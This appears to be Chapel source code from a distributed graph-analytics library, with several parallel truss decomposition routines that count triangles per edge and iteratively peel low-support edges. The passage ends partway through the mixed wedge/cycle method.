proc TrussDecompositionListIntersection(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int,
dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
var k=kvalue;
// Index of the first edge surviving the final round; Ne-largest is reported
// as the size of the largest k-truss.
var largest:int;
largest=Ne;
// Mark edge `cur` deleted if an identical earlier copy (or <v,u> with u>v)
// exists; return the duplicate's ID or -1. Edge 0 can never be a duplicate.
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// Given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
// (tries both orientations); -1 for self-loops/out-of-domain/missing.
proc findEdge(u:int,v:int):int {
// Given the destination array dst and the edge range [l,h], return the edge ID e where dst[e]==key.
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirected edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirected edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
// Preprocessing (serial over all edges): drop self-loops, edges incident to
// vertices with total degree < k-1, and duplicated edges.
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
ConFlag=true;
while (ConFlag) {
ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
// uadj/vadj accumulate the surviving (forward + reverse) neighbors of
// u and v; the intersection size is edge i's triangle support.
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
// |uadj ∩ vadj| = number of triangles on edge i.
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
// Peel every surviving edge with support below k-2.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
} else {
ConFlag=true;
}
SetCurF.clear();
var tmpi=0;
// Nothing removed this round: if any edge survives, raise k and continue;
// otherwise the decomposition is finished.
if (ConFlag==false) {
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
//k=k+1;
break; // BUGFIX: restored — without it tmpi never advances and this loop never terminates
} else {
tmpi+=1;
}
}
if (ConFlag) {
k+=1;
}
if (tmpi>0) {
largest=tmpi;
}
}
N2+=1;
}// end while
timer.stop();
outMsg="After Truss Decomposition List Intersection, Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection, Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Truss Decomposition List Intersection, The largest k truss edges ="+(Ne-largest):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
// Publish the per-edge deletion labels through the symbol table.
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussDecompositionListIntersection
//For undirected graph, use triangle search method.
      proc TrussDecomposition(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
                      neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
          // Truss decomposition of an undirected graph using the triangle-search method.
          // Starting from k=kvalue, it repeatedly peels edges whose triangle support is
          // below k-2; when a round removes nothing and undeleted edges remain, k is
          // incremented, until every edge has been assigned a truss level.
          //
          // kvalue                  : initial k to start the decomposition from
          // nei,start_i,src,dst     : CSR-style arrays of the forward edge lists
          // neiR,start_iR,srcR,dstR : CSR-style arrays of the reversed edge lists
          // TriCount                : per-edge atomic triangle counters (written here)
          // returns                 : message naming the symbol-table entry holding EdgeDeleted
          //
          // EdgeDeleted encoding used throughout:
          //   -1  : edge still alive
          //   1-k : tentatively removed in the current round (promoted later)
          //   k-1 : finally removed at truss level k
          var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
          var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
          var N2=0:int;
          var ConFlag=true:bool;
          EdgeDeleted=-1;
          var RemovedEdge: atomic int;
          var timer:Timer;
          var k=kvalue;
          var largest:int;
          RemovedEdge.write(0);
          largest=Ne;
          // Mark edge `cur` as deleted (value k-1) when it duplicates an earlier <u,v>,
          // or duplicates the reverse <v,u> when u>v; returns the duplicate's edge ID or -1.
          proc RemoveDuplicatedEdges( cur: int):int {
               //if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
               if ( (cur==0) ) {
                    return -1;
               }
               var u=src[cur]:int;
               var v=dst[cur]:int;
               var lu=start_i[u]:int;
               var nu=nei[u]:int;
               var lv=start_i[v]:int;
               var nv=nei[v]:int;
               var DupE:int;
               if ((nu<=1) || (cur<=lu)) {
                   DupE=-1;
               } else {
                   // look for an earlier copy of <u,v> inside u's edge list
                   DupE =binSearchE(dst,lu,cur-1,v);
               }
               if (DupE!=-1) {
                    EdgeDeleted[cur]=k-1;
               } else {
                   if (u>v) {
                      // u>v: the canonical direction <v,u> may already exist; check v's list
                      if (nv<=0) {
                         DupE=-1;
                      } else {
                         DupE=binSearchE(dst,lv,lv+nv-1,u);
                      }
                      if (DupE!=-1) {
                           EdgeDeleted[cur]=k-1;
                      }
                   }
               }
               return DupE;
          }
          // given vertices u and v, return the edge ID e=<u,v>
          proc exactEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    // range check against the sorted dst slice before binary search
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               return eid;
          }
          // given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
          proc findEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               if (eid==-1) {// if b
                    // <u,v> not stored; try the opposite orientation <v,u>
                    beginE=start_i[v];
                    if (nei[v]>0) {
                         if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
                              eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
                              // search <v,u> in undirect edges
                         }
                    }
               }// end of if b
               return eid;
          }// end of proc findEdge(u:int,v:int)
          //First off, we remove the duplicated and cycle edges. This is common for all methods.
          //coforall loc in Locales {
          //   on loc {
          {
              {
                   //var ld = src.localSubdomain();
                   //var startEdge = ld.low;
                   //var endEdge = ld.high;
                   // preprocessing runs over the whole edge range on one locale
                   var startEdge = 0;
                   var endEdge = Ne-1;
                   forall i in startEdge..endEdge {
                       var v1=src[i];
                       var v2=dst[i];
                       if ( (nei[v1]+neiR[v1])<k-1 ||
                            ((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
                          //we will delete all the edges connected with a vertex only has very small degree
                          //(less than k-1)
                          EdgeDeleted[i]=k-1;
                          // we can safely delete the edge <u,v> if the degree of u or v is less than k-1
                          // we also remove the self-loop like <v,v>
                       }
                       if (EdgeDeleted[i]==-1) {
                            var DupE= RemoveDuplicatedEdges(i);
                            if (DupE!=-1) {
                                 //we find duplicated edge
                            }
                       }
                   }
              }
          }// end of preprocessing block (formerly a coforall over Locales)
          //After Preprocessing
          timer.start();
          {
              // first we calculate the number of triangles
              coforall loc in Locales with ( ref SetNextF) {
                  on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     forall i in startEdge..endEdge with(ref SetCurF){
                         // adjacency set of the lower-degree endpoint, restricted to live edges
                         var sVadj = new set(int, parSafe = true);
                         var u = src[i];
                         var v = dst[i];
                         var du=nei[u]+neiR[u];
                         var dv=nei[v]+neiR[v];
                         var sV:int;
                         var lV:int;
                         var ldV:int;
                         if ( du<=dv ) {
                             sV=u;
                             lV=v;
                             ldV=dv;
                         } else {
                             sV=v;
                             lV=u;
                             ldV=du;
                         }
                         // here we search from the vertex who has small degree
                         {
                             var beginTmp=start_i[sV];
                             var endTmp=beginTmp+nei[sV]-1;
                             if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
                                if ( (nei[sV]>0) ){
                                   // collect sV's live out-neighbors (excluding lV)
                                   forall x in dst[beginTmp..endTmp] with (ref sVadj) {
                                       var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
                                       if (e!=-1){
                                           if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
                                                sVadj.add(x);
                                           }
                                       }
                                   }
                                }
                                beginTmp=start_iR[sV];
                                endTmp=beginTmp+neiR[sV]-1;
                                if ((neiR[sV]>0) ){
                                   // collect sV's live in-neighbors from the reversed arrays
                                   forall x in dstR[beginTmp..endTmp] with (ref sVadj) {
                                       var e=exactEdge(x,sV);
                                       if (e!=-1){
                                           if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
                                                sVadj.add(x);
                                           }
                                       }
                                   }
                                }
                                if (! sVadj.isEmpty() ){
                                    var Count=0:int;
                                    // every shared neighbor s with a live edge to lV closes a triangle
                                    forall s in sVadj with ( + reduce Count) {
                                        var ds1=nei[s]+neiR[s];
                                        var e:int;
                                        if (ds1<=ldV) {
                                           e=findEdge(s,lV);
                                        } else {
                                           e=findEdge(lV,s);
                                        }
                                        if ( (e!=-1) && (e!=i) ) {
                                            if ( EdgeDeleted[e]==-1) {
                                                  Count +=1;
                                            }
                                        }
                                    }
                                    TriCount[i].write(Count);
                                     // here we get the number of triangles of edge ID i
                                }// end of if
                             }//end of if EdgeDeleted[i]==-1
                         }// end of triangle counting
                     }// end of forall. We get the number of triangles for each edge
                  }// end of on loc
              } // end of coforall loc in Locales
          }
          ConFlag=true;
          // Peeling rounds: each iteration removes edges with support < k-2, propagates
          // the support decrements, and bumps k when nothing more can be removed.
          while (ConFlag) {
              // here we mark the edges whose number of triangles is less than k-2 as 1-k
              coforall loc in Locales with (ref SetCurF ) {
                 on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     // each locale only handles the edges owned by itself
                     forall i in startEdge..endEdge with(ref SetCurF){
                         if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
                              EdgeDeleted[i] = 1-k;
                              SetCurF.add(i);
                         }
                     }
                 }// end of on loc
              } // end of coforall loc in Locales
              ConFlag=false;
              // we try to remove as many edges as possible in the following code
              var tmpN2=0:int;
              while (SetCurF.getSize()>0) {
                  //first we build the edge set that will be affected by the removed edges in SetCurF
                  coforall loc in Locales with ( ref SetNextF) {
                      on loc {
                           var ld = src.localSubdomain();
                           var startEdge = ld.low;
                           var endEdge = ld.high;
                           forall i in SetCurF with (ref SetNextF) {
                              if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
                                  var v1=src[i];
                                  var v2=dst[i];
                                  var dv1=nei[v1]+neiR[v1];
                                  var dv2=nei[v2]+neiR[v2];
                                  var sv1:int;
                                  var lv2:int;
                                  var sdv1:int;
                                  var ldv2:int;
                                  // enumerate from the lower-degree endpoint, as in counting
                                  if (dv1<=dv2) {
                                      sv1=v1;
                                      lv2=v2;
                                      sdv1=dv1;
                                      ldv2=dv2;
                                  } else {
                                      sv1=v2;
                                      lv2=v1;
                                      sdv1=dv2;
                                      ldv2=dv1;
                                  }
                                  {
                                      var nextStart=start_i[sv1];
                                      var nextEnd=start_i[sv1]+nei[sv1]-1;
                                      if (nei[sv1]>0) {
                                         forall j in nextStart..nextEnd with (ref SetNextF){
                                             var v3=src[j];//v3==sv1
                                             var v4=dst[j];
                                             var tmpe:int;
                                             if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
                                                 var dv4=nei[v4]+neiR[v4];
                                                 if (ldv2<=dv4) {
                                                      tmpe=findEdge(lv2,v4);
                                                 } else {
                                                      tmpe=findEdge(v4,lv2);
                                                 }
                                                 if (tmpe!=-1) {// there is such third edge
                                                     if ( EdgeDeleted[tmpe]<=-1 ) {
                                                         // decrement support only on still-live edges; the
                                                         // (i<tmpe)/(i<j) tie-breaks avoid double decrements
                                                         // when both frontier edges see the same triangle
                                                         if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
                                                             TriCount[tmpe].sub(1);
                                                             if TriCount[tmpe].read() <k-2 {
                                                                 SetNextF.add((i,tmpe));
                                                             }
                                                             TriCount[j].sub(1);
                                                             if TriCount[j].read() <k-2 {
                                                                 SetNextF.add((i,j));
                                                             }
                                                         } else {
                                                             if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
                                                                 TriCount[j].sub(1);
                                                                 if TriCount[j].read() <k-2 {
                                                                     SetNextF.add((i,j));
                                                                 }
                                                             } else {
                                                                 if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
                                                                     TriCount[tmpe].sub(1);
                                                                     if TriCount[tmpe].read() <k-2 {
                                                                         SetNextF.add((i,tmpe));
                                                                     }
                                                                 }
                                                             }
                                                         }
                                                     }
                                                 }
                                             }// end of if EdgeDeleted[j]<=-1
                                         }// end of forall j in nextStart..nextEnd
                                      }// end of if nei[sv1]>0
                                      // same propagation over sv1's reversed (incoming) edges
                                      nextStart=start_iR[sv1];
                                      nextEnd=start_iR[sv1]+neiR[sv1]-1;
                                      if (neiR[sv1]>0) {
                                         forall j in nextStart..nextEnd with (ref SetNextF){
                                             var v3=srcR[j];//sv1==v3
                                             var v4=dstR[j];
                                             var e1=exactEdge(v4,v3);// we need the edge ID in src instead of srcR
                                             var tmpe:int;
                                             if (e1!=-1) {
                                                 if ( (EdgeDeleted[e1]<=-1) && ( lv2!=v4 ) ) {
                                                     // we first check if the two different vertices can be the third edge
                                                     var dv4=nei[v4]+neiR[v4];
                                                     if ldv2<dv4 {
                                                          tmpe=findEdge(lv2,v4);
                                                     } else {
                                                          tmpe=findEdge(v4,lv2);
                                                     }
                                                     if (tmpe!=-1) {// there is such third edge
                                                         if ( EdgeDeleted[tmpe]<=-1 ) {
                                                             if ( (EdgeDeleted[e1]==-1) && (EdgeDeleted[tmpe]==-1) ) {
                                                                 TriCount[tmpe].sub(1);
                                                                 if TriCount[tmpe].read() <k-2 {
                                                                     SetNextF.add((i,tmpe));
                                                                 }
                                                                 TriCount[e1].sub(1);
                                                                 if TriCount[e1].read() <k-2 {
                                                                     SetNextF.add((i,e1));
                                                                 }
                                                             } else {
                                                                 if ((EdgeDeleted[e1]==-1) && (i<tmpe)) {
                                                                     TriCount[e1].sub(1);
                                                                     if TriCount[e1].read() <k-2 {
                                                                         SetNextF.add((i,e1));
                                                                     }
                                                                 } else {
                                                                     if ((EdgeDeleted[tmpe]==-1) &&(i<e1)) {
                                                                         TriCount[tmpe].sub(1);
                                                                         if TriCount[tmpe].read() <k-2 {
                                                                             SetNextF.add((i,tmpe));
                                                                         }
                                                                     }
                                                                 }
                                                             }
                                                         }
                                                     }
                                                 }
                                             }
                                         }// end of forall j in nextStart..nextEnd
                                      }// end of if
                                  }// end of affected edge search
                              } // end if (xlocal(i,startEdge,endEdge)
                           } // end forall i in SetCurF with (ref SetNextF)
                      } //end on loc
                  } //end coforall loc in Locales
                  // finalize this round: promote the tentative 1-k marks to the final value k-1
                  coforall loc in Locales with (ref SetCurF ) {
                      on loc {
                         var ld = src.localSubdomain();
                         var startEdge = ld.low;
                         var endEdge = ld.high;
                         forall i in SetCurF {
                             if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
                                   EdgeDeleted[i]=k-1;
                             }
                         }
                      }
                  }
                  SetCurF.clear();
                  // then we try to remove the affected edges
                  coforall loc in Locales {
                      on loc {
                         var ld = src.localSubdomain();
                         var startEdge = ld.low;
                         var endEdge = ld.high;
                         forall (i,j) in SetNextF {
                             if (xlocal(j,startEdge,endEdge)) {//each locale only check its owned edges
                                  if (EdgeDeleted[j]==-1) {
                                      EdgeDeleted[j]=1-k;
                                      SetCurF.add(j);
                                  }
                             }
                         }
                      } //end on loc
                  } //end coforall loc in Locales
                  RemovedEdge+=SetCurF.getSize();
                  tmpN2+=1;
                  SetNextF.clear();
              }// end of while
              //check if all edges have been removed
              var tmpi=0;
              while tmpi<Ne {
                  if (EdgeDeleted[tmpi]==-1) {
                      // some edge survived this k: move on to the next truss level
                      ConFlag=true;
                      k=k+1;
                      break;
                  } else {
                      tmpi+=1;
                  }
              }
              N2+=1;
          }// end while
          timer.stop();
          // NOTE(review): AllRemoved appears to be a module-level flag; set unconditionally here
          AllRemoved=true;
          outMsg="After Truss Decomposition, Max K ="+(k-1):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After Truss Decomposition ,Total execution time="+(timer.elapsed()):string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          outMsg="After Truss Decomposition, Total number of iterations ="+N2:string;
          smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
          // publish EdgeDeleted (per-edge truss levels) through the symbol table
          var countName = st.nextName();
          var countEntry = new shared SymEntry(EdgeDeleted);
          st.addEntry(countName, countEntry);
          var cntMsg = 'created ' + st.attrib(countName);
          return cntMsg;
      } // end of proc TrussDecomposition
      //For an undirected graph, use the mixed (wedge + cycle) method.
      proc TrussDecompositionMix(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
                      neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] atomic int):string throws{
          // Truss decomposition of an undirected graph using the mixed method: triangles
          // are counted once per edge by splitting them into wedge (u->v, u->x) and cycle
          // (u->v->x->u) cases, with (i<e)/(i<e3) orderings preventing double counting.
          // Edges with support below k-2 are then peeled round by round; k is incremented
          // when a round removes nothing and live edges remain.
          //
          // kvalue                  : initial k to start the decomposition from
          // nei,start_i,src,dst     : CSR-style arrays of the forward edge lists
          // neiR,start_iR,srcR,dstR : CSR-style arrays of the reversed edge lists
          // TriCount                : per-edge atomic triangle counters (written here)
          // returns                 : message naming the symbol-table entry holding EdgeDeleted
          //
          // EdgeDeleted encoding: -1 alive, 1-k tentatively removed this round, k-1 final.
          var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
          var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
          var N2=0:int;
          var ConFlag=true:bool;
          EdgeDeleted=-1;
          var RemovedEdge=0: int;
          var timer:Timer;
          var k=kvalue;
          // Mark edge `cur` as deleted (value k-1) when it duplicates an earlier <u,v>,
          // or duplicates the reverse <v,u> when u>v; returns the duplicate's edge ID or -1.
          proc RemoveDuplicatedEdges( cur: int):int {
               //if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
               if ( (cur==0) ) {
                    return -1;
               }
               var u=src[cur]:int;
               var v=dst[cur]:int;
               var lu=start_i[u]:int;
               var nu=nei[u]:int;
               var lv=start_i[v]:int;
               var nv=nei[v]:int;
               var DupE:int;
               if ((nu<=1) || (cur<=lu)) {
                   DupE=-1;
               } else {
                   // look for an earlier copy of <u,v> inside u's edge list
                   DupE =binSearchE(dst,lu,cur-1,v);
               }
               if (DupE!=-1) {
                    EdgeDeleted[cur]=k-1;
               } else {
                   if (u>v) {
                      // u>v: the canonical direction <v,u> may already exist; check v's list
                      if (nv<=0) {
                         DupE=-1;
                      } else {
                         DupE=binSearchE(dst,lv,lv+nv-1,u);
                      }
                      if (DupE!=-1) {
                           EdgeDeleted[cur]=k-1;
                      }
                   }
               }
               return DupE;
          }
          // given vertices u and v, return the edge ID e=<u,v> or e=<v,u>
          proc findEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               if (eid==-1) {// if b
                    // <u,v> not stored; try the opposite orientation <v,u>
                    beginE=start_i[v];
                    if (nei[v]>0) {
                         if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
                              eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
                              // search <v,u> in undirect edges
                         }
                    }
               }// end of if b
               return eid;
          }// end of proc findEdge(u:int,v:int)
          // given vertices u and v, return the edge ID e=<u,v>
          proc exactEdge(u:int,v:int):int {
               //given the destination array ary, the edge range [l,h], return the edge ID e where ary[e]=key
               if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
                    return -1;
                    // we do not accept self-loop
               }
               var beginE=start_i[u];
               var eid=-1:int;
               if (nei[u]>0) {
                    if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
                         eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
                         // search <u,v> in undirect edges
                    }
               }
               return eid;
          }// end of proc exactEdge(u:int,v:int)
          //here we first remove the duplicated and cycle edges
          //coforall loc in Locales {
          //   on loc {
          {
              {
                   //var ld = src.localSubdomain();
                   //var startEdge = ld.low;
                   //var endEdge = ld.high;
                   // preprocessing runs over the whole edge range on one locale
                   var startEdge = 0;
                   var endEdge = Ne-1;
                   forall i in startEdge..endEdge {
                       var v1=src[i];
                       var v2=dst[i];
                       if ( (nei[v1]+neiR[v1])<k-1 ||
                            ((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
                          //we will delete all the edges connected with a vertex only has very small degree
                          //(less than k-1)
                          EdgeDeleted[i]=k-1;
                          //writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
                          // we can safely delete the edge <u,v> if the degree of u or v is less than k-1
                          // we also remove the self-loop like <v,v>
                          if (v1==v2) {
                               //writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
                          }
                       }
                       if (EdgeDeleted[i]==-1) {
                            var DupE= RemoveDuplicatedEdges(i);
                            if (DupE!=-1) {
                                 //we find duplicated edge
                            }
                       }
                   }
              }
          }// end of preprocessing block (formerly a coforall over Locales)
          //writeln("After Preprocessing");
          timer.start();
          //we will try to remove all the unnecessary edges in the graph
          //while (ConFlag) {
          //we should not need the loop for non-naive version
          {
              // first we calculate the number of triangles
              coforall loc in Locales with ( ref SetNextF) {
                  on loc {
                     var ld = src.localSubdomain();
                     var startEdge = ld.low;
                     var endEdge = ld.high;
                     forall i in startEdge..endEdge {
                         TriCount[i].write(0);
                     }
                     //forall i in startEdge..endEdge with(ref SetCurF){
                     forall i in startEdge..endEdge {
                         var u = src[i];
                         var v = dst[i];
                         var du=nei[u];
                         var dv=nei[v];
                         {
                             var beginTmp=start_i[u];
                             var endTmp=beginTmp+nei[u]-1;
                             if ((EdgeDeleted[i]==-1) && (u!=v) ){
                                if ( (nei[u]>1) ){
                                   //forall x in dst[beginTmp..endTmp] with (ref uadj) {
                                   forall x in dst[beginTmp..endTmp] {
                                       var e=exactEdge(u,x);//here we find the edge ID to check if it has been removed
                                       if (e==-1){
                                          //writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
                                       } else {
                                          if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
                                              var e3=findEdge(x,v);
                                              // wedge case i<e, u->v, u->x
                                              if (e3!=-1) {
                                                  if (EdgeDeleted[e3]==-1) {
                                                      // one triangle {i,e,e3}: bump all three supports
                                                      TriCount[i].add(1);
                                                      TriCount[e].add(1);
                                                      TriCount[e3].add(1);
                                                  }
                                              }
                                          }
                                       }
                                   }
                                }
                             }
                             beginTmp=start_i[v];
                             endTmp=beginTmp+nei[v]-1;
                             if ((EdgeDeleted[i]==-1) && (u!=v) ){
                                if ( (nei[v]>0) ){
                                   //forall x in dst[beginTmp..endTmp] with (ref vadj) {
                                   forall x in dst[beginTmp..endTmp] {
                                       var e=exactEdge(v,x);//here we find the edge ID to check if it has been removed
                                       if (e==-1){
                                          //writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
                                       } else {
                                          if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
                                              var e3=exactEdge(x,u);
                                              if (e3!=-1) {
                                                  if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
                                                      // cycle case i<e,i<e3, u->v->x->u
                                                      TriCount[i].add(1);
                                                      TriCount[e].add(1);
                                                      TriCount[e3].add(1);
                                                  }
                                              }
